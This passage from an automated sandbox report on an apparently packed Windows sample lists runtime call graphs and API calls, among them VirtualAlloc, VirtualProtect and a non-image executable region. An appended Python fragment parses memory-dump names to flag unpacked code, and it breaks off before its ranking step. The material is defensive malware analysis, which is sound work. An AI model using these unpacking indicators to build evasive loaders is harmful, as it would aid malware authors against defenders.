8707 26500c __dosmaperr 20 API calls 8705->8707 8706 269cd0 8764 269cff 8706->8764 
8707->8706 8710 264cce _abort 20 API calls 8709->8710 8711 265011 8710->8711 8711->8694 8712->8698 8714 269d56 8713->8714 8751 269d4f 8713->8751 8715 269d5a 8714->8715 8716 269d79 8714->8716 8718 26500c __dosmaperr 20 API calls 8715->8718 8719 269dca 8716->8719 8720 269dad 8716->8720 8717 2629bb _ValidateLocalCookies 5 API calls 8721 269f30 8717->8721 8722 269d5f 8718->8722 8723 269de0 8719->8723 8767 26a22b 8719->8767 8725 26500c __dosmaperr 20 API calls 8720->8725 8721->8706 8724 26501f __dosmaperr 20 API calls 8722->8724 8770 2698cd 8723->8770 8727 269d66 8724->8727 8729 269db2 8725->8729 8730 264f63 _abort 26 API calls 8727->8730 8732 26501f __dosmaperr 20 API calls 8729->8732 8730->8751 8735 269dba 8732->8735 8733 269e27 8736 269e81 WriteFile 8733->8736 8737 269e3b 8733->8737 8734 269dee 8738 269e14 8734->8738 8739 269df2 8734->8739 8740 264f63 _abort 26 API calls 8735->8740 8744 269ea4 GetLastError 8736->8744 8750 269e0a 8736->8750 8741 269e43 8737->8741 8742 269e71 8737->8742 8782 2696ad GetConsoleCP 8738->8782 8743 269ee8 8739->8743 8777 269860 8739->8777 8740->8751 8746 269e61 8741->8746 8747 269e48 8741->8747 8808 269943 8742->8808 8743->8751 8753 26501f __dosmaperr 20 API calls 8743->8753 8744->8750 8800 269b10 8746->8800 8747->8743 8793 269a22 8747->8793 8750->8743 8750->8751 8755 269ec4 8750->8755 8751->8717 8754 269f0d 8753->8754 8757 26500c __dosmaperr 20 API calls 8754->8757 8758 269edf 8755->8758 8759 269ecb 8755->8759 8757->8751 8815 264fe9 8758->8815 8760 26501f __dosmaperr 20 API calls 8759->8760 8762 269ed0 8760->8762 8763 26500c __dosmaperr 20 API calls 8762->8763 8763->8751 8856 266895 LeaveCriticalSection 8764->8856 8766 269d05 8766->8703 8820 26a1ad 8767->8820 8842 268d32 8770->8842 8772 2698dd 8773 2698e2 8772->8773 8774 264c4a _abort 38 API calls 8772->8774 8773->8733 8773->8734 8775 269905 8774->8775 8775->8773 8776 269923 GetConsoleMode 8775->8776 8776->8773 8778 2698ba 8777->8778 8781 269885 8777->8781 8778->8750 8779 26a3a1 
WriteConsoleW CreateFileW 8779->8781 8780 2698bc GetLastError 8780->8778 8781->8778 8781->8779 8781->8780 8787 269822 8782->8787 8791 269710 8782->8791 8783 2629bb _ValidateLocalCookies 5 API calls 8784 26985c 8783->8784 8784->8750 8786 267f6a 40 API calls __fassign 8786->8791 8787->8783 8788 269796 WideCharToMultiByte 8788->8787 8789 2697bc WriteFile 8788->8789 8790 269845 GetLastError 8789->8790 8789->8791 8790->8787 8791->8786 8791->8787 8791->8788 8792 2697ed WriteFile 8791->8792 8851 266ba1 8791->8851 8792->8790 8792->8791 8794 269a31 8793->8794 8795 269af3 8794->8795 8797 269aaf WriteFile 8794->8797 8796 2629bb _ValidateLocalCookies 5 API calls 8795->8796 8799 269b0c 8796->8799 8797->8794 8798 269af5 GetLastError 8797->8798 8798->8795 8799->8750 8807 269b1f 8800->8807 8801 269c2a 8802 2629bb _ValidateLocalCookies 5 API calls 8801->8802 8803 269c39 8802->8803 8803->8750 8804 269ba1 WideCharToMultiByte 8805 269bd6 WriteFile 8804->8805 8806 269c22 GetLastError 8804->8806 8805->8806 8805->8807 8806->8801 8807->8801 8807->8804 8807->8805 8810 269952 8808->8810 8809 269a05 8812 2629bb _ValidateLocalCookies 5 API calls 8809->8812 8810->8809 8811 2699c4 WriteFile 8810->8811 8811->8810 8813 269a07 GetLastError 8811->8813 8814 269a1e 8812->8814 8813->8809 8814->8750 8816 26500c __dosmaperr 20 API calls 8815->8816 8817 264ff4 __dosmaperr 8816->8817 8818 26501f __dosmaperr 20 API calls 8817->8818 8819 265007 8818->8819 8819->8751 8829 266949 8820->8829 8822 26a1bf 8823 26a1c7 8822->8823 8824 26a1d8 SetFilePointerEx 8822->8824 8825 26501f __dosmaperr 20 API calls 8823->8825 8826 26a1f0 GetLastError 8824->8826 8828 26a1cc 8824->8828 8825->8828 8827 264fe9 __dosmaperr 20 API calls 8826->8827 8827->8828 8828->8723 8830 266956 8829->8830 8831 26696b 8829->8831 8832 26500c __dosmaperr 20 API calls 8830->8832 8834 26500c __dosmaperr 20 API calls 8831->8834 8836 266990 8831->8836 8833 26695b 8832->8833 8835 26501f __dosmaperr 20 API calls 8833->8835 8837 26699b 8834->8837 8839 
266963 8835->8839 8836->8822 8838 26501f __dosmaperr 20 API calls 8837->8838 8840 2669a3 8838->8840 8839->8822 8841 264f63 _abort 26 API calls 8840->8841 8841->8839 8843 268d3f 8842->8843 8844 268d4c 8842->8844 8845 26501f __dosmaperr 20 API calls 8843->8845 8846 26501f __dosmaperr 20 API calls 8844->8846 8847 268d58 8844->8847 8849 268d44 8845->8849 8848 268d79 8846->8848 8847->8772 8850 264f63 _abort 26 API calls 8848->8850 8849->8772 8850->8849 8852 264c4a _abort 38 API calls 8851->8852 8853 266bac 8852->8853 8854 267f84 __fassign 38 API calls 8853->8854 8855 266bbc 8854->8855 8855->8791 8856->8766 8860 26af44 8857->8860 8859 26afea 8859->8681 8861 26af50 ___scrt_is_nonwritable_in_current_image 8860->8861 8871 266872 EnterCriticalSection 8861->8871 8863 26af5e 8864 26af85 8863->8864 8865 26af90 8863->8865 8872 26b06d 8864->8872 8867 26501f __dosmaperr 20 API calls 8865->8867 8868 26af8b 8867->8868 8887 26afba 8868->8887 8870 26afad ___scrt_is_nonwritable_in_current_image 8870->8859 8871->8863 8873 266949 26 API calls 8872->8873 8876 26b07d 8873->8876 8874 26b083 8890 2668b8 8874->8890 8876->8874 8877 26b0b5 8876->8877 8878 266949 26 API calls 8876->8878 8877->8874 8879 266949 26 API calls 8877->8879 8881 26b0ac 8878->8881 8882 26b0c1 CloseHandle 8879->8882 8884 266949 26 API calls 8881->8884 8882->8874 8885 26b0cd GetLastError 8882->8885 8883 26b0fd 8883->8868 8884->8877 8885->8874 8886 264fe9 __dosmaperr 20 API calls 8886->8883 8899 266895 LeaveCriticalSection 8887->8899 8889 26afc4 8889->8870 8891 26692e 8890->8891 8893 2668c7 8890->8893 8892 26501f __dosmaperr 20 API calls 8891->8892 8894 266933 8892->8894 8893->8891 8898 2668f1 8893->8898 8895 26500c __dosmaperr 20 API calls 8894->8895 8896 26691e 8895->8896 8896->8883 8896->8886 8897 266918 SetStdHandle 8897->8896 8898->8896 8898->8897 8899->8889 8900->8655 8901->8635 8228 26504a 8229 26505a 8228->8229 8238 265070 8228->8238 8230 26501f __dosmaperr 20 API calls 8229->8230 8231 26505f 8230->8231 8232 264f63 
_abort 26 API calls 8231->8232 8234 265069 8232->8234 8235 2650da 8235->8235 8258 263923 8235->8258 8236 265148 8240 264676 ___free_lconv_mon 20 API calls 8236->8240 8238->8235 8241 2651bb 8238->8241 8247 2651da 8238->8247 8239 26513f 8239->8236 8244 2651cd 8239->8244 8264 26874b 8239->8264 8240->8241 8273 2653f4 8241->8273 8245 264f73 _abort 11 API calls 8244->8245 8246 2651d9 8245->8246 8248 2651e6 8247->8248 8249 26479b _abort 20 API calls 8248->8249 8250 265214 8249->8250 8251 26874b 26 API calls 8250->8251 8252 265240 8251->8252 8253 264f73 _abort 11 API calls 8252->8253 8254 26526f ___scrt_fastfail 8253->8254 8255 265310 FindFirstFileExA 8254->8255 8256 26535f 8255->8256 8257 2651da 26 API calls 8256->8257 8259 263938 8258->8259 8260 263934 8258->8260 8259->8260 8261 26479b _abort 20 API calls 8259->8261 8260->8239 8262 263966 8261->8262 8263 264676 ___free_lconv_mon 20 API calls 8262->8263 8263->8260 8267 26869a 8264->8267 8265 2686af 8266 26501f __dosmaperr 20 API calls 8265->8266 8268 2686b4 8265->8268 8272 2686da 8266->8272 8267->8265 8267->8268 8270 2686eb 8267->8270 8268->8239 8269 264f63 _abort 26 API calls 8269->8268 8270->8268 8271 26501f __dosmaperr 20 API calls 8270->8271 8271->8272 8272->8269 8274 2653fe 8273->8274 8275 26540e 8274->8275 8277 264676 ___free_lconv_mon 20 API calls 8274->8277 8276 264676 ___free_lconv_mon 20 API calls 8275->8276 8278 265415 8276->8278 8277->8274 8278->8234 8335 26368a 8336 2636b5 8335->8336 8337 263699 8335->8337 8339 2659ba 51 API calls 8336->8339 8337->8336 8338 26369f 8337->8338 8341 26501f __dosmaperr 20 API calls 8338->8341 8340 2636bc GetModuleFileNameA 8339->8340 8342 2636e0 8340->8342 8343 2636a4 8341->8343 8358 2637ae 8342->8358 8344 264f63 _abort 26 API calls 8343->8344 8346 2636ae 8344->8346 8348 263923 20 API calls 8349 26370a 8348->8349 8350 263713 8349->8350 8351 26371f 8349->8351 8352 26501f __dosmaperr 20 API calls 8350->8352 8353 2637ae 38 API calls 8351->8353 8357 263718 8352->8357 8354 263735 
8353->8354 8356 264676 ___free_lconv_mon 20 API calls 8354->8356 8354->8357 8355 264676 ___free_lconv_mon 20 API calls 8355->8346 8356->8357 8357->8355 8360 2637d3 8358->8360 8362 263833 8360->8362 8364 265d45 8360->8364 8361 2636fd 8361->8348 8362->8361 8363 265d45 38 API calls 8362->8363 8363->8362 8367 265cec 8364->8367 8368 2647f8 __fassign 38 API calls 8367->8368 8369 265d00 8368->8369 8369->8360 8902 263bca 8903 263be2 8902->8903 8904 263bdc 8902->8904 8905 263adc 20 API calls 8904->8905 8905->8903 8370 26ae8b 8371 26aea4 __startOneArgErrorHandling 8370->8371 8373 26aecd __startOneArgErrorHandling 8371->8373 8374 26b464 8371->8374 8375 26b49d __startOneArgErrorHandling 8374->8375 8376 26b735 __raise_exc RaiseException 8375->8376 8377 26b4c4 __startOneArgErrorHandling 8375->8377 8376->8377 8378 26b507 8377->8378 8380 26b4e2 8377->8380 8379 26ba26 __startOneArgErrorHandling 20 API calls 8378->8379 8382 26b502 __startOneArgErrorHandling 8379->8382 8385 26ba55 8380->8385 8383 2629bb _ValidateLocalCookies 5 API calls 8382->8383 8384 26b52b 8383->8384 8384->8373 8386 26ba64 8385->8386 8387 26ba83 __startOneArgErrorHandling 8386->8387 8388 26bad8 __startOneArgErrorHandling 8386->8388 8390 26362c __startOneArgErrorHandling 5 API calls 8387->8390 8389 26ba26 __startOneArgErrorHandling 20 API calls 8388->8389 8393 26bad1 8389->8393 8391 26bac4 8390->8391 8392 26ba26 __startOneArgErrorHandling 20 API calls 8391->8392 8391->8393 8392->8393 8393->8382 7913 265e17 7914 265e27 7913->7914 7917 265e37 ___from_strstr_to_strchr 7913->7917 7915 26501f __dosmaperr 20 API calls 7914->7915 7916 265e2c 7915->7916 7918 265e9a 7917->7918 7921 265e6e 7917->7921 7959 266052 7917->7959 7919 26501f __dosmaperr 20 API calls 7918->7919 7920 265e9f 7919->7920 7925 264676 ___free_lconv_mon 20 API calls 7920->7925 7924 265eb8 7921->7924 7927 265e91 7921->7927 7946 265efd 7921->7946 7924->7920 7928 26479b _abort 20 API calls 7924->7928 7925->7916 7927->7918 7927->7946 7930 265ec9 7928->7930 
7929 265f2d 7931 264676 ___free_lconv_mon 20 API calls 7929->7931 7932 264676 ___free_lconv_mon 20 API calls 7930->7932 7934 265f35 7931->7934 7935 265ed4 7932->7935 7933 265f71 7933->7920 7936 26731c __onexit 29 API calls 7933->7936 7942 265f3e 7934->7942 7978 26731c 7934->7978 7935->7920 7940 26479b _abort 20 API calls 7935->7940 7935->7946 7937 265f9f 7936->7937 7939 264676 ___free_lconv_mon 20 API calls 7937->7939 7939->7942 7941 265ef2 7940->7941 7944 264676 ___free_lconv_mon 20 API calls 7941->7944 7942->7920 7942->7942 7947 26479b _abort 20 API calls 7942->7947 7943 265f5e 7945 264676 ___free_lconv_mon 20 API calls 7943->7945 7944->7946 7945->7942 7946->7920 7974 266103 7946->7974 7948 265fec 7947->7948 7949 266032 7948->7949 7950 2646fe 26 API calls 7948->7950 7951 264676 ___free_lconv_mon 20 API calls 7949->7951 7952 266000 7950->7952 7951->7920 7953 266047 7952->7953 7954 266007 SetEnvironmentVariableA 7952->7954 7955 264f73 _abort 11 API calls 7953->7955 7954->7949 7956 26602d 7954->7956 7957 266051 7955->7957 7958 26501f __dosmaperr 20 API calls 7956->7958 7958->7949 7960 266067 7959->7960 7961 266060 7959->7961 7962 26479b _abort 20 API calls 7960->7962 7961->7921 7964 266084 7962->7964 7963 2660f1 7965 264758 _abort 38 API calls 7963->7965 7964->7963 7967 2660f6 7964->7967 7970 26479b _abort 20 API calls 7964->7970 7971 264676 ___free_lconv_mon 20 API calls 7964->7971 7972 2646fe 26 API calls 7964->7972 7973 2660e0 7964->7973 7965->7967 7966 264676 ___free_lconv_mon 20 API calls 7966->7961 7968 264f73 _abort 11 API calls 7967->7968 7969 266102 7968->7969 7970->7964 7971->7964 7972->7964 7973->7966 7975 265f20 7974->7975 7977 266118 7974->7977 7975->7929 7975->7933 7977->7975 7987 268abb 7977->7987 7979 267327 7978->7979 7980 26734f 7979->7980 7982 267340 7979->7982 7981 26735e 7980->7981 8079 268c96 7980->8079 8086 268cc9 7981->8086 7984 26501f __dosmaperr 20 API calls 7982->7984 7986 267345 ___scrt_fastfail 7984->7986 7986->7943 7988 268acf 
7987->7988 7993 268ac9 7987->7993 8004 268ae4 7988->8004 7991 2691ba 8024 2691d7 7991->8024 7993->7991 7994 26917f 7993->7994 7996 26919c 7993->7996 7995 26501f __dosmaperr 20 API calls 7994->7995 7997 269184 7995->7997 7996->7991 7998 2691a6 7996->7998 7999 264f63 _abort 26 API calls 7997->7999 8000 26501f __dosmaperr 20 API calls 7998->8000 8003 26918f 7999->8003 8001 2691ab 8000->8001 8002 264f63 _abort 26 API calls 8001->8002 8002->8003 8003->7977 8005 2647f8 __fassign 38 API calls 8004->8005 8006 268afa 8005->8006 8007 268b16 8006->8007 8008 268adf 8006->8008 8009 268b2d 8006->8009 8010 26501f __dosmaperr 20 API calls 8007->8010 8008->7977 8012 268b36 8009->8012 8013 268b48 8009->8013 8011 268b1b 8010->8011 8017 264f63 _abort 26 API calls 8011->8017 8014 26501f __dosmaperr 20 API calls 8012->8014 8015 268b55 8013->8015 8016 268b68 8013->8016 8018 268b3b 8014->8018 8019 2691d7 46 API calls 8015->8019 8035 269536 8016->8035 8017->8008 8021 264f63 _abort 26 API calls 8018->8021 8019->8008 8021->8008 8023 26501f __dosmaperr 20 API calls 8023->8008 8025 269221 ___ascii_strnicmp 8024->8025 8026 2691e9 8024->8026 8025->8003 8027 2647f8 __fassign 38 API calls 8026->8027 8029 2691f7 8027->8029 8028 269211 8030 26501f __dosmaperr 20 API calls 8028->8030 8029->8028 8034 269223 8029->8034 8031 269216 8030->8031 8032 264f63 _abort 26 API calls 8031->8032 8032->8025 8033 267e56 46 API calls 8033->8034 8034->8025 8034->8033 8036 2647f8 __fassign 38 API calls 8035->8036 8037 269549 8036->8037 8040 26928e 8037->8040 8043 2692c2 8040->8043 8041 2629bb _ValidateLocalCookies 5 API calls 8042 268b7e 8041->8042 8042->8008 8042->8023 8044 2693b0 MultiByteToWideChar 8043->8044 8046 269335 GetCPInfo 8043->8046 8051 2692e9 8043->8051 8045 2693ce 8044->8045 8044->8051 8048 2646b0 __onexit 21 API calls 8045->8048 8052 2693ef __alloca_probe_16 8045->8052 8047 269344 8046->8047 8046->8051 8047->8044 8047->8051 8048->8052 8049 269513 8054 266f6b __freea 20 API calls 8049->8054 8050 269442 
MultiByteToWideChar 8050->8049 8053 26945e MultiByteToWideChar 8050->8053 8051->8041 8052->8049 8052->8050 8053->8049 8055 269478 8053->8055 8054->8051 8056 2646b0 __onexit 21 API calls 8055->8056 8059 269499 __alloca_probe_16 8055->8059 8056->8059 8057 2694d6 MultiByteToWideChar 8058 269506 8057->8058 8060 2694ed 8057->8060 8062 266f6b __freea 20 API calls 8058->8062 8059->8057 8059->8058 8063 266333 8060->8063 8062->8049 8071 266202 8063->8071 8068 26634f 8069 2629bb _ValidateLocalCookies 5 API calls 8068->8069 8070 2663a1 8069->8070 8070->8058 8072 26621c _abort 5 API calls 8071->8072 8073 266218 8072->8073 8073->8068 8074 2665ec 8073->8074 8075 26621c _abort 5 API calls 8074->8075 8076 266613 8075->8076 8077 2629bb _ValidateLocalCookies 5 API calls 8076->8077 8078 26638f CompareStringW 8077->8078 8078->8068 8080 268cb6 HeapSize 8079->8080 8081 268ca1 8079->8081 8080->7981 8082 26501f __dosmaperr 20 API calls 8081->8082 8083 268ca6 8082->8083 8084 264f63 _abort 26 API calls 8083->8084 8085 268cb1 8084->8085 8085->7981 8087 268cd6 8086->8087 8088 268ce1 8086->8088 8089 2646b0 __onexit 21 API calls 8087->8089 8090 268ce9 8088->8090 8096 268cf2 _abort 8088->8096 8094 268cde 8089->8094 8091 264676 ___free_lconv_mon 20 API calls 8090->8091 8091->8094 8092 268cf7 8095 26501f __dosmaperr 20 API calls 8092->8095 8093 268d1c HeapReAlloc 8093->8094 8093->8096 8094->7986 8095->8094 8096->8092 8096->8093 8097 2674c4 _abort 7 API calls 8096->8097 8097->8096 8394 267394 GetProcessHeap 7315 262092 7320 2626fa SetUnhandledExceptionFilter 7315->7320 7317 262097 pre_c_initialization 7321 2640a7 7317->7321 7319 2620a2 7320->7317 7322 2640b3 7321->7322 7323 2640cd 7321->7323 7322->7323 7324 26501f __dosmaperr 20 API calls 7322->7324 7323->7319 7325 2640bd 7324->7325 7326 264f63 _abort 26 API calls 7325->7326 7327 2640c8 7326->7327 7327->7319 8098 262212 8101 262484 8098->8101 8100 262217 8100->8100 8102 2624a7 8101->8102 8103 2624b4 GetSystemTimeAsFileTime GetCurrentThreadId 
GetCurrentProcessId QueryPerformanceCounter 8101->8103 8102->8103 8104 2624ab 8102->8104 8103->8104 8104->8100 8279 264d53 8287 2663a7 8279->8287 8282 264d67 8283 264cce _abort 20 API calls 8284 264d6f 8283->8284 8285 264d7c 8284->8285 8294 264d7f 8284->8294 8288 26621c _abort 5 API calls 8287->8288 8289 2663ce 8288->8289 8290 2663e6 TlsAlloc 8289->8290 8293 2663d7 8289->8293 8290->8293 8291 2629bb _ValidateLocalCookies 5 API calls 8292 264d5d 8291->8292 8292->8282 8292->8283 8293->8291 8295 264d8f 8294->8295 8296 264d89 8294->8296 8295->8282 8298 2663fd 8296->8298 8299 26621c _abort 5 API calls 8298->8299 8300 266424 8299->8300 8301 26643c TlsFree 8300->8301 8302 266430 8300->8302 8301->8302 8303 2629bb _ValidateLocalCookies 5 API calls 8302->8303 8304 26644d 8303->8304 8304->8295 8395 d03765 8396 d03792 8395->8396 8397 d00005 GetPEB 8396->8397 8398 d0379e 8397->8398 8399 d04675 GetPEB 8398->8399 8400 d037b1 8399->8400 8401 d037b9 8400->8401 8402 d0386f 8400->8402 8403 d03345 9 API calls 8401->8403 8406 d04035 8402->8406 8405 d0384f 8403->8405 8407 d03345 9 API calls 8406->8407 8408 d0403f 8407->8408 8408->8405 8906 262ed0 8907 262ee2 8906->8907 8909 262ef0 @_EH4_CallFilterFunc@8 8906->8909 8908 2629bb _ValidateLocalCookies 5 API calls 8907->8908 8908->8909 8409 26a091 8410 26a0b5 8409->8410 8411 26a0ce 8410->8411 8413 26ae8b __startOneArgErrorHandling 8410->8413 8412 26ac73 21 API calls 8411->8412 8414 26a118 8411->8414 8412->8414 8415 26b464 21 API calls 8413->8415 8416 26aecd __startOneArgErrorHandling 8413->8416 8415->8416 8417 262f9f 8418 262fb6 8417->8418 8419 262fa9 8417->8419 8419->8418 8420 264676 ___free_lconv_mon 20 API calls 8419->8420 8420->8418 8105 265419 8110 26544e 8105->8110 8108 265435 8109 264676 ___free_lconv_mon 20 API calls 8109->8108 8111 265460 8110->8111 8112 265427 8110->8112 8113 265465 8111->8113 8114 265490 8111->8114 8112->8108 8112->8109 8115 26479b _abort 20 API calls 8113->8115 8114->8112 8116 26731c __onexit 29 API calls 
8114->8116 8117 26546e 8115->8117 8118 2654ab 8116->8118 8119 264676 ___free_lconv_mon 20 API calls 8117->8119 8120 264676 ___free_lconv_mon 20 API calls 8118->8120 8119->8112 8120->8112

        Control-flow Graph

        APIs
        • GetConsoleWindow.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000080), ref: 002616FA
        • SetWindowPos.USER32(00000000), ref: 00261701
        • VirtualProtect.KERNELBASE(32342DD0,000002E2,00000040,?), ref: 00261EE2
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Window$ConsoleProtectVirtual
        • String ID: s=$,52$-9$0852$952$99_1$99cb$99fd$99fd$9S1Z$9obc$S=]2$gJ0xZISNT1QdY$oS2Z$M,=
        • API String ID: 2778018546-69423270
        • Opcode ID: 74864227211106a3b77f37cab878b13b7fa1d5f96a3d637c62092114488ae3dd
        • Instruction ID: 804441e8564c106b41cd610dd3b247decf1c9d8717c3a8d3919b555ce14a4b21
        • Opcode Fuzzy Hash: 74864227211106a3b77f37cab878b13b7fa1d5f96a3d637c62092114488ae3dd
        • Instruction Fuzzy Hash: 8D7299B2B5435A8BEB60CFB9DDC938ABAB0F715300F4445B8D548EB785D7789A858F00
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 450 2626fa-262705 SetUnhandledExceptionFilter
        C-Code - Quality: 100%
        			E002626FA() {
        				_Unknown_base(*)()* _t1;
        
        				_t1 = SetUnhandledExceptionFilter(E00262706); // executed
        				return _t1;
        			}





        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(Function_00002706,00262097), ref: 002626FF
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: e8f09c4807e8781d514f37eb2fb4b0ae164b850d9c5a277ad9807b65e9ea380f
        • Instruction ID: 14f904f24e09a44563244aae23fdd1d2f679eb90983097f1245eff154fe88aa0
        • Opcode Fuzzy Hash: e8f09c4807e8781d514f37eb2fb4b0ae164b850d9c5a277ad9807b65e9ea380f
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 12 d01fb5-d02e1b call d04ab5 15 d02e2b-d02e30 12->15 16 d02e1d-d02e29 call d04ab5 12->16 17 d03335-d0333a 15->17 16->15 20 d02e35-d0301c call d00005 VirtualAlloc * 8 call d01f65 * 8 call d046c5 * 2 call d04ab5 16->20 45 d0302c-d03043 call d046c5 20->45 46 d0301e-d03023 call d04ab5 20->46 51 d03046-d03052 call d04c15 45->51 49 d03028-d0302a 46->49 49->45 49->51 54 d03063-d0306f call d04c15 51->54 55 d03054-d0305e call d04c15 call d01e75 51->55 61 d03071-d03083 call d01635 54->61 62 d030cd-d030e3 54->62 55->54 65 d03088-d03095 61->65 66 d030e5-d030e7 62->66 67 d030ec-d030f8 call d04c15 62->67 65->62 68 d03097-d030a3 call d04ab5 65->68 66->17 73 d03132-d0313e call d04c15 67->73 74 d030fa-d0312d call d046c5 call d00265 67->74 68->62 75 d030a5-d030b1 call d04ab5 68->75 83 d03140-d03158 call d046c5 73->83 84 d03178-d03184 call d04c15 73->84 90 d032c0-d032e1 call d01f15 74->90 75->62 82 d030b3-d030ca call d046c5 75->82 82->62 92 d0315d-d03173 call d00265 83->92 95 d03186-d031b9 call d046c5 call d00265 84->95 96 d031be-d031ca call d04c15 84->96 102 d032ec-d032f0 90->102 92->90 95->90 107 d03204-d03210 call d04c15 96->107 108 d031cc-d031ff call d046c5 call d00265 96->108 105 d032f2-d0330c call d01985 102->105 106 d03328-d03330 ExitProcess 102->106 114 d03311-d03314 105->114 106->17 120 d03212-d03245 call d046c5 call d00265 107->120 121 d03247-d03253 call d04c15 107->121 108->90 117 d03316 114->117 118 d03318-d0331c 114->118 117->106 123 d03326 118->123 124 d0331e 118->124 120->90 130 d03255-d03288 call d046c5 call d00265 121->130 131 d0328a-d032bb call d046c5 call d00265 121->131 123->102 124->123 130->90 131->90
        APIs
        • VirtualAlloc.KERNELBASE(00000000,00000002,00003000,00000004,E84126B8,388F3ADB), ref: 00D02E5B
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00D02E71
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00D02E87
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 00D02E9B
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 00D02EAF
        • VirtualAlloc.KERNELBASE(00000000,0000003C,00003000,00000004), ref: 00D02EC3
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 00D02ED7
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00D02EED
          • Part of subcall function 00D046C5: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 00D04863
        • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6B68C4C6), ref: 00D0332A
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AllocVirtual$ExitProcess
        • String ID:
        • API String ID: 2301755047-0
        • Opcode ID: c8ee65299836c68aca4ffeeb21d0863f818415c9a351e9db538496d913c3f3ce
        • Instruction ID: ac8bd54dad2658fb530f6a316e94d665f15dd09a927c0997731e48b21d1e8ff2
        • Opcode Fuzzy Hash: c8ee65299836c68aca4ffeeb21d0863f818415c9a351e9db538496d913c3f3ce
        • Instruction Fuzzy Hash: D7A23620A14658D6EB20DF60DC55BDE7236EF68700F1050E9A20DEB3E1E77A5F81CB5A
        Uniqueness

        Uniqueness Score: -1.00%
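
The Memory Dump Source lines are the fastest way to separate image-backed code from unpacked code on this report: the 0x261000 dump is PAGE_EXECUTE_READ, MEM_IMAGE and "based on PE: true" (the original module), while the 0xD00000 dump is PAGE_EXECUTE_READWRITE, MEM_PRIVATE and "based on PE: false", which is exactly the profile of a manually mapped loader. The Python below is an added example and is not part of the Joe Sandbox report. The .sdmp field layout it assumes (fifth dotted field = page protection, seventh = memory type) is inferred from the dump names on this page and is an assumption, not documented format; the dump names it ranks are constructed copies of the ones shown above. It ranks dumps so that private, executable, writable, non-PE-backed regions come first.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Constructed (name, based_on_PE) pairs mirroring this report's Memory Dump Source lines.
SAMPLE_DUMPS = [
    ("00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp", False),
]

# Win32 PAGE_* protection constants (low byte) and MEM_* region types.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0xF0      # PAGE_EXECUTE | EXECUTE_READ | EXECUTE_READWRITE | EXECUTE_WRITECOPY
WRITE_MASK = 0xCC     # PAGE_READWRITE | WRITECOPY | EXECUTE_READWRITE | EXECUTE_WRITECOPY


@dataclass
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int
    pe_backed: bool

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_dump_name(name: str, pe_backed: bool) -> DumpRegion:
    """Assumed layout: <pid>.<stage>.<id>.<base>.<protect>.<?>.<type>.<?>.sdmp (inferred, not documented)."""
    fields = name.rsplit(".", 1)[0].split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name}")
    return DumpRegion(
        name=name,
        base=int(fields[3], 16),
        protect=int(fields[4], 16) & 0xFF,
        mem_type=int(fields[6], 16),
        pe_backed=pe_backed,
    )


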